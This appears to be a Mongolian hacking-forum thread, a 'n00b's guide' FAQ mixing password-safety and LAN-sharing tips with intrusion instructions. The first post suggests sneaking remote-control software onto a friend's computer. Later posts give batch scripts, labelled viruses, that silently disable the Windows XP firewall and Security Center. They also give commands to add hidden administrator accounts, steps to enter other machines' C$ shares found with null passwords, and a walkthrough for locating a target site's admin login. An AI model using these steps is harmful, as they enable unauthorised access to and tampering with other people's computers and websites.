#AsuultSambar :

ASUULT.NET - МОНГОЛ УЛС МАНДАН БАДРАГ!
Одоогоор 7-р сар.02.26 7:25 am байна

Бүх цагууд UTC+09:00




Шинэ сэдэв оруулах  Сэдвэд хариулах  [ 7 постууд ] 
Зохиогч Мэссэж
 Постын сэдэв: n00b's guide
БичлэгБичигдсэн: 10-р сар.08.10 12:37 pm 
Оффлайн
Asuult Precious Member
Хэрэглэгчийн аватар

Нэгдсэн: 2-р сар.07.09 9:44 pm
Бичлэгүүд: 2784
Байршил: Ulaanbaatar Mongolia
энэхүү зааварийг доош нь буулгав


За манай "Networking & Hackology and Security Issue" форум нэг үеээ бодвол нилээд олон хүн орж гардаг форум болжээ. Гэтэл бас сайнаа дагаад саар гэгчээр нэгэн хэвийн асуултыг их олон газар олон сэдэв болгож асуух боллоо. Энэ бүгдэд зарим нь хариулаад зарим бүр залхаж эхэлж байна. Тэгээд энэхүү сэдвийг нээж байна. Энд зөвхөн модууд билэг хийх ба хэрвээ та энд бичлэг хийхийг хүсвэл яг энэ хэлбэрээр Асуулт Хариулт гэсэн загвартай пм мод-уудын хэн нэгэнд илгээнэ үү. Бид таны нэрийг дурьдан ишлэл болгон оруулах болно. За тэгээд ийм зааварчилгаа өгөөд байхад ийм асуулт тавиад энд тэнд бичээд яваад байвал n00b-с ч долоон дор юм болно ш дээ :mrgreen:


А: Энд ер нь жинхэнэ хакерууд байдаг юм уу?
Х: Хариулт байхгүй. Хэн ч өөрийгөө "Би хакер" гэж зарладаггүй. Тэглээ гээд байхгүй гэж хэлж болохгүй. Яг тэр тэр жинхэнэ хакер гэсэн юм бас байхгүй.

А: Яахоо гүүглэ зэргийн майлын пассийг олж болох уу?
Х: Яг серверээс нь хакердаж авана гэдэг бараг боломжгүй. Залилах, хуурах, замаас нь унших, тагнах гэх мэт өөр олон аргаар олох боломжтой.

А: Тэгвэл ******* энэ хаягийн пассийг олоод өгөөч тэх үү? Их чухал хэрэгтэй байгаа юм аа?
Х: Хэн ч хэзээ ч өөрт шал хамаагүй царайг нь ч хараагүй мэдэхгүй хүний төлөө цагаа гарздаад пассийг нь тайлж өгөх гээд сууж байна гэж байхгүй. Тиймээс ийм утгагүй асуулт хэзээ ч битгий тавьж бай. (Магадгүй хангалттай их мөнгө төлж байгаа бол өөр хэрэг.)

А: Тэхдээ тэр майл чинь яг миний өөрийн майл ш дээ. Манай найз намайг хуурч байгаад нууц үгийг маань авцан юмаа. Гуйж байна PLS!!!
Х: Ингэлээ гээд юуг ч өөрчлөхгүй. Нууц үгээ алдхаасаа өмнө бодох хэрэгтэй байж дээ. Ер нь нууц үгээ хэзээ ямар ч үед бусдад битгий хэлж бай. Яагаад гэвэл тэр чинь НУУЦ ҮГ шүү дээ. Нууц үгээ алдахгүй байх хэдэн зөвлөмж өгье. Эхлээд сайн нууц үг сонгож авах хэрэгтэй. Сайн нууц үг сонгохын тулд 10-аас олон тэмдэгт агуулсан, том жижиг үсэг, тоо, тусгай тэмдэгт хольсон, мөн хэрэглэгчийн нэр бүтнээрээ болон хэсэгчилсэн байдлаар ороогүй байхаар сонгож авах хэрэгтэй. Мөн гүүглэ яахоо зэрэг аврагууд хэзээ ч танд нууц үгээ солих болон баталгаажуулах тухай санал тавьдаггүй. Тиймээс тиймэрхүү захиа ирвэл шууд устгах хэрэгтэй. Бас хэзээ ч өөр хүний ком ашиглаж байгаа бол нууц үгээ комд нь сануулах хэрэггүй. Мөн майлынхаа нууц үгийг өөр ямарч сайтын хэрэглэгчийн нууц үгтэй адилханаар өгч болохгүй. Болж өгвөл нууц үгээ 2-3 секундэд оруулж сурах хэрэгтэй. Хажуунаас чинь гарлуу чинь хичнээс сайн бүлтийж ширтсэн ч гэсэн ийм хугацаанд оруулсан 10 тэмдэгтийг хүн санаж амжихгүй.

А: Хакер гэж яг ямар хүн байдаг юм бэ?
Б: Яг нэгдсэн ойлголт байхгүй. Цагаан хар энэ тэр гэж ангилдаг энэ тэр гэж зөндөө л ярьдаг. Би бол сайн систем администратор бол хакер гэж боддог. Энэ нь илүү дөхүү юм шиг санагддаг.


А: Яаж хакер болох вэ? Би хакер болмоор байна.
Х: Хэн ч хакер болж болно. Сайн унш, сайн суралц. Яг тийм тийм юм сураад хакер болно гэсэн сургалтын төлөвлөгөө байхгүй. Хамгийн энгийн зөвөлгөөнүүдийг өгч болох юм. Ямар ч байсан аль нэг програмчлалын хэлийг сайн мэддэг бол. Тэгвэл яадаж бусдыг нь гадарладаг болно. Аль нэг сервер үйлдлийн системийг суулгаж үзээд оролдоод бай. Мөн түгээмэл хэрэглэгддэг apache,iis зэргий суулгаад ажлуулж үз. Сүлжээний тухай ямар нэг сайн номыг залхууралгүй нухацтай сайн унш. Тэгвэл сүлжээ гэж юу байдгийг ойлгоно. Мөн хамгийн энгийн халдлагын аргуудын тухай судал, туршиж үз. Бэлэн тоглож болдог сайтууд хүртэл байгаа.

А: Зөө зөө бүтэхгүй юм байна л даа аймаар их хугцаа орох юм байна ш дээ зүгээр нэг вэб эвддэг аргыг заагаад өгчихөж болохгүй юм уу?
Б: Бүх вэб таардаг түлхүүр гэж байхгүй. Бүтэхгүй гэж байгаа бол одоо шууд орхиод өөр чадах зүйлээрээ мөнгө олж амьдарлаа дээшлүүлхээ бод. Хугцааны хувьд харилцан адилгүй. Үнэхээр хичээгээд их цаг зарцуулж чадвал 6 сарын дараа эхний үр дүн гарч эхлэнэ.

А: ** ком дотоод сүлжээнд холбох гэсэн юм аа. Тэгээд бас интернэтэд холбох гэсэн юм туслаач?
Х: Хэрвээ 5-с олон ком нэг сүлжээнд холбох гэж байгаа бол ихэндээ албан байгуулга гэсэн үг. Тиймээс ийм зүйл хийдэг мэргэжлийн хүмүүсээр мөнгийг нь төлөөд хийлгэсэн нь дээр. Хэн ч ямарч төлбөргүйгээр хэн нэгний сүлжээний шийдэл дээр толгойгоо гашилгахыг хүсдэггүй. Үнэхээр мөнгө төлөх сонирхолгүй өөрөө хийж дөнгөнө гэж бодож байгаа бол энэ форумыг эхнээс нь унш. Энэ тухай нилээдгүй олон удаа ярилцаж байсан. Шууд бэлэн будаа амандаа хийлгэх гэсний хэрэггүй. Энэ чинь цаад хүмүүстээ ямар их төвөгтэй байдгийг ойлгохыг хичээх хэрэгтэй. Хэрвээ 5-с олон ком холбох гэж байгаа гэхдээ байгуулга биш бол та баян юм. Тиймээс шийдэл нь яг адилхан.

А: Би *******-с нэтээ авдаг юм л даа. Энийг салаалж болох уу? Яаж салаалах вэ?
Х: Ямар ч нэт-ийг салаалж болно. Ямар ч шүү! Хэрхэн салаалах тухай болвол тус бүрд нь гарын авлага гаргахыг хичээе. Гэхдээ хэзээ гэдэг дээр тодорхой хугацаа хэлж чадахгүй нь. Уг форумаа уншвал энэ тухай бас нилээдгүй ярилцсан санагдаж байна. Залхууралгүй унш даа...


А: 2 ком шууд холбох гэсэн юм. Яаж холбох вэ?
Х: Сүлжээний кабел зардаг газараас очоод кабелаа авахдаа “CROSSOVER-р хавчаад өг” гэж хэлээд кабелаа ав. Тэгээд 2 комоо холбоод нэгнийх нь IP хаягийг 192.168.0.1 нөгөөг нь 192.168.0.2 гэж тааруулаад subnet mask гэсэн дээр нь 255.255.255.0 гэж тааруулаад өөр юуг нь ч өөрчлөлгүй хадгалаад гар. Шалгахдаа command promt дээрээ ping 192.168.0.* гээд (*-ийн оронд эсрэг комын дугаарыг 1 эсвэл 2 тавиад) enter дар. Хэрвээ REQUEST TIME OUT гэж гарч ирж байвал холбогдоогүй гэсэн үг. Өөр урт олон бичиг гарч ирж байвал холбогдсон гэсэн үг.

А: За 2 комоо холбочихлоо одоо яаж нэгнээс нь нөгөөд нь интернетээ салаалах вэ?
Х: Эхлээд ингэх гэж байгаа хэлэхгүй яадаг n00b вэ... Интернетээ салаалхын тулд төв компьютер чинь 2 лан карттай байх хэрэгтэй. нэгдүгээр лангаараа интернэтэд холбогдоно. хоёрдугаар лан дээрээ хаягийг нь 192.168.0.1 гэж тааруулах хэрэгтэй. Хоёрдугаар лангаа салаалах гэж байгаа комтойгоо холбоно. ингэхдээ өмнөх асуудал дээрх шиг CROSSOVER кабел хэрэглэнэ. харин 2дахь компьтерийн хаягийг автоматаар авна гэдгээр тохируулах хэрэгтэй. одоо 1-р лангийн properties-руу нь ороод Advanced таб байгаа. Тэнд чинь internet connection sharing гэсэн хэсгийн хамгийн эхний сонголтыг чагтла. ингээд л болох ёстой. Жишээ болгоод ситинэтийн интернетийг салаалж байгаа зургийг үзүүлэв. /Тэр улаанаар зурсаныг чагтлахгүй/
Зураг

А: Ping хийхээр болж байгаа мөртлөө холбогдохгүй байна. жишээ нь дота тоглох гэхээр криэт нь гарч ирэхгүй байна.
Х: Юуний чинь холбогдохгүй байна гэж. Наадах чинь холбогдсон байна. Хэрвээ тоглоом болон бусад програмууд дээр болохгүй бол firewall-аа тохируулах хэрэгтэй. Тохируулж чадахгүй бол шууд firewall-аа унтраах хэрэгтэй. Шари хийсэн фолдер чинь харагдахгүй бол network setup wizard-г next->next->finish гээд уншуулчих. Тэгээд харагдах болно.

А: Би найзынхаа комд нууцаар нэвтэрмээр байна. Надад туслаач.
Х: Алсаас комийг удирдах олон програм байдаг. Radmin гэх мэт гэх мэт гэгчлэн. Эдгээр нь мэдээж заавал нөгөө ком дээр жижиг хэмжээний програм суулгахыг шаарддаг. Мөн алсаас нэвтрэх эрхтэй хэрэглэгчийн нэр болон нууц үг шаардлагатай. Програмыг бол худлаа хөөргөж байгаад ч юмуу вирусанд дамнуулах гэх мэтээр яаж ийгээд суулгаж болно. Хэрэглэгчийн нэр болон нууц үгийг олох аргууд нь мөн адил олон янз байж болно. Эднийг бүгдийг ингэдэг тэгдэг гээд тайлбарлаад суух хүн байвал надад хэлээд энд бичлэг хийж болно. Харин би залхуурч байна.

А: Яаж хүний комд пассийг нь мэдэхгүйгээр сэмхэн орчоод гарах вэ?
Х: Хамгийн энгийн арга бол Administrator хэрэглэгчийг нууц үгээр хамгаалсан эсхийг шалга. Ингэхдээ ком асаад логин хэсэг гарч ирхэд ctrl+alt+del дараад гарч ирэх цонхны хэрэглэгчийн нэрний хэсэгт Administrator гэж бичээд ор. Хэрвээ пасс хийсэн бол сэмээрхэн орох боломжгүй гэсэн үг.

А: Өөр ямар нэг аргаар орж болох уу?
Х: Мэдээж бололгүй яахав. Adminchanger, ERD Commander мөн жижиг линукс түүлүүд ашиглаад хэрэлэгчийн нууц үгийг усгаж оронд нь өөр нууц үг хийгээд орж болно. Гэхдээ эдгээр нь нууц үгийг заавал устгадаг гэдгийг анхаараарай.

А: Интернэтийнхээ хурдыг яаж шалгах вэ?
Х: http://www.speedtest.net http://www.speakeasy.net/speedtest эдгээр сайтууд нээх худал заахгүй байх.

A: Web-р дамжиж яаж мессенжерт ордог юм бэ?
Х: http://www.meebo.com

_________________
534f118bd57bbdc66b969869cce0dab


Дээд талд
БичлэгБичигдсэн: 10-р сар.08.10 12:51 pm 
Оффлайн
Asuult Precious Member
Хэрэглэгчийн аватар

Нэгдсэн: 2-р сар.07.09 9:44 pm
Бичлэгүүд: 2784
Байршил: Ulaanbaatar Mongolia
хэн нэгэнд тус болох зүйлс байвал оруулж болно
асуух асуулт байвал асууж болно

_________________
534f118bd57bbdc66b969869cce0dab


Дээд талд
БичлэгБичигдсэн: 11-р сар.03.10 6:57 pm 
Оффлайн
Asuult Precious Member
Хэрэглэгчийн аватар

Нэгдсэн: 2-р сар.07.09 9:44 pm
Бичлэгүүд: 2784
Байршил: Ulaanbaatar Mongolia
А:Windows XP SP2-ийн Firewall-ийг хэрхэн унтраах вэ ?
Windows XP SP2-ийн Firewall-ийг унтраах Virus. Энэ нь Register-т өөрчлөлт
оруулдаг юм.
Одоо txt Editor нээгээд үүнийг бич:
Код:
@reg add
"HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\Sta
ndardProfile" /v EnableFirewall /t REG_DWORD /d 00000000 /f>NUL
@reg add
"HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\Sta
ndardProfile" /v DoNotAllowExceptions /t REG_DWORD /d 00000000 /f>NUL
@reg add
"HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\Sta
ndardProfile" /v DisableNotifications /t REG_DWORD /d 00000001 /f>NUL
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод fwkill.bat гэсэн нэрээр хадагла.
А:Яаж Windows XP SP2-ийн Security Center-ийг унтраах
Windows XP SP2-ийн Security Center-ийг унтраах Virus гэвэл txt Editor нээгээд
үүнийг бич:
@ECHO OFF
Код:
sc stop wscsvc>NUL
sc delete wscsvc>NUL
Гэж бичээд Menu-гээс FILE/FILE SAVE AS дараад Filetype гэдэг дотороос АllFile-г
сонгоод sckill.bat гэсэн нэрээр хадагла.
А:хэрхэн Windows Admin-ий Passwort солих вэ ?
Маш олон хүн windows-н admin-ий passwort-оо мартачихлаа гэж надад Mail ирэж
байна. Хэрэв та Windows XP мөн Windows 2003 хэргэлдэг мөн түлхүүр үгээ
мартсан бол энэ хамгийн амархан аргыг хэрэглээрэй.
Эхлээд та ямар ч хамаагүй User-р ор. Тэгээд Start - Run дараад cmd гэж өгөөд Enter
дар. Эсвэл win+r дар. Ингэсний дараа MS-Dos-ийн ажилын талбар гарч ирнэ. Одоо
эдгээрийг өг:
net user administrator passwort
passwort гэдэгийн оронд өөрийнхөө шинэ түлхүүр үгээ өгөөрэй
net user shinehereglegch passwort /add
энэ бол шинэ хэрэглэгч оруулаж байна
net localgroup administratoren shinehereglegch /add
энэ бол шинэ хэрэглэгчид Admin-ий эрх өгөж байна
net user hereglegch /del
энэ бол хэрэглэгчийг устгаж байна
Энэ бол маш энгийн хамгийн амархан арга болно.
А: хэрхэн Bat-ийг EXE болгох вэ ?
BAT өрөгтгөлтэй File-г EXE өрөгтгөлтэй болгохийн тулд таньд Batch File Compiler
гэсэн Editor хэрэг болно. Та манай сангаас татаад аваарай. Одоо та Bat2exe.zip
задлаад BATCOMP.EXE дууд. Энэ үед нэгэн Editor гэрч ирнэ. Editor дээр
өөрийнхөө code бичээд FILE/Compile дээр дар. Энэ үеп нэгэн цонх гарч ирнэ(Select
executable type) Эндээс та Windows95/98/ME/NT/2000/XP (Default) гэдэгийг
сонгоод ok дар. Ингээд та exe үүсэглээ. Хэрэв таньд өөр сайн Compiler байвал
хэлээрэй.
Windows 2000/NT дээрэх C$, ADMIN$ гэх мэт хамгаалагдсан Share-луу нэвтрэхэд
Windows 2000/NT дээрэх C$, ADMIN$ гэх мэт хамгаалагдсан Share-луу хэрхэн
нэвтрэхэд NTscan гэсэн Tool хэрэг болно. Та одоо манай сангаас татаж аваад задал.
Тэгээд NTscan.exe-г дууд. Хайх IP-гээ өгөөд ConnectShare$ гэдэгээс C$ сонго.
Тэгээд SMBscan сонгоод Start дээр дар. Олдож буй IP дээр Password гэдэг дээр
[NULL] Type гэдэг дээр Unknow гэж байвал ажилтгүй гэсэн үг. Хэрэв олдож буй IP
дээр Password гэдэг дээр [NULL] Type гэдэг дээр Admin(эсвэл өөрч байж болно)
гэж байвал Password-гүй нэвтэрхэд боломжтой гэсэн үг. Хэрэв олдож буй IP дээр
Password гэдэг дээр ямар нэг үг Type гэдэг дээр Admin(эсвэл өөрч байж болно) гэж
байвал Password-тай нэвтэрхэд боломжтой гэсэн үг. Одоо нэвтрэх боложтой IP дээр
хулагныхаа зүүн товч дээр дараад Connect дар. Одоо тэр энэ компютер дээр MSDOS
орчимд ажиллах боложтой боллоо гэсэн үг. Одоо та START/RUN дараад
жишээгээр бол \\123.45.67.123\c гэж бичээд enter дарна. Ингээд та олдсон Password
эсвэл UserName өгөөд нэвтэрлээ.

_________________
534f118bd57bbdc66b969869cce0dab


Дээд талд
БичлэгБичигдсэн: 11-р сар.24.10 4:36 pm 
Оффлайн
Asuult Precious Member
Хэрэглэгчийн аватар

Нэгдсэн: 2-р сар.07.09 9:44 pm
Бичлэгүүд: 2784
Байршил: Ulaanbaatar Mongolia
Хэрхэн сайтын админы логин хэсэгийг олох вэ
хэрэг болох зүйлс
1. admin page finder download
2. active perl download
татаад дууссаны дараа
start>run>cmd гэж ороод
c\ гэж бичээд enter
Зураг
одоо харин admin.pl гэж бичээд enter
Зураг
одоо бай болох вэб сайтынхаа нэрийг бичнэ
Зураг
кодынхоо хэлийг бич жишээ нь asp , php , cfm гэх мэт ямар ч байж болно
Зураг
одоо хайгаад олсон нь found гэж гарч ирнэ
Зураг

_________________
534f118bd57bbdc66b969869cce0dab


Дээд талд
БичлэгБичигдсэн: 11-р сар.24.10 4:47 pm 
Оффлайн
Asuult Precious Member
Хэрэглэгчийн аватар

Нэгдсэн: 2-р сар.07.09 9:44 pm
Бичлэгүүд: 2784
Байршил: Ulaanbaatar Mongolia
Хэрхэн ямар нэг сайтын ip авах вэ ?
эхлээд start>run>cmd
nslookup www.тухайн сайтынхаа нэрийг бичнэ.com
Зураг
одоо ip-гаа хөтөчдөө хийгээд үз тухай сайтад орно
мөн нэтээр ip хайдаг сайт
http://www.ipvoid.com :wd:

_________________
534f118bd57bbdc66b969869cce0dab


Дээд талд
 Постын сэдэв: Re: n00b's guide
БичлэгБичигдсэн: 12-р сар.05.13 1:49 am 
Оффлайн
Жирийн Нэгэн Гишvvн
Жирийн Нэгэн Гишvvн
Хэрэглэгчийн аватар

Нэгдсэн: 10-р сар.24.13 9:00 am
Бичлэгүүд: 14
Байршил: Интернетэд
Уул нь энэ хэсгийг л идэвхжүүлмээр байгаа юм даа.


Дээд талд
 Постын сэдэв: Re: n00b's guide
БичлэгБичигдсэн: 12-р сар.05.13 4:26 am 
Оффлайн
Asuult Precious Member
Хэрэглэгчийн аватар

Нэгдсэн: 2-р сар.07.09 9:44 pm
Бичлэгүүд: 2784
Байршил: Ulaanbaatar Mongolia
завтахгүй болхоор хэцүү л байна

_________________
534f118bd57bbdc66b969869cce0dab


Дээд талд
Өмнөх сэтгэгдлүүдийг үзүүлэх:  Эрэмбэлэх  
Шинэ сэдэв оруулах  Сэдвэд хариулах  [ 7 постууд ] 

Бүх цагууд UTC+09:00


Хэн онлайн байна

Энэ форумыг үзэж буй хэрэглэгчид: Бүртгэлтэй хэрэглэгчид байхгүй болон 1 зочин


Чи шинэ сэдвүүд оруулж чадахгүй энэ форумд
Чи хариу бичиж чадахгүй энэ форумд сэдвүүдэд
Чи чадахгүй өөрийн постуудыг энэ форумд засварлах
Чи чадахгүй өөрийн постуудыг энэ форумд устгах
Чи чадахгүй хавсралтуудыг энэ форумд оруулах

Хайх:
Дахин очих:  

Copyright Asuult.NET © 2000-2015.
Administrative Contact: Khundaga Khurelbaatar [[email protected]]
Tel: 1-888-303-4927, Fax: 1-888-406-2264.
Powered by phpBB © 2000-2015 phpBB Group. phpBB® Forum Software © phpBB Limited-ийн хүчээр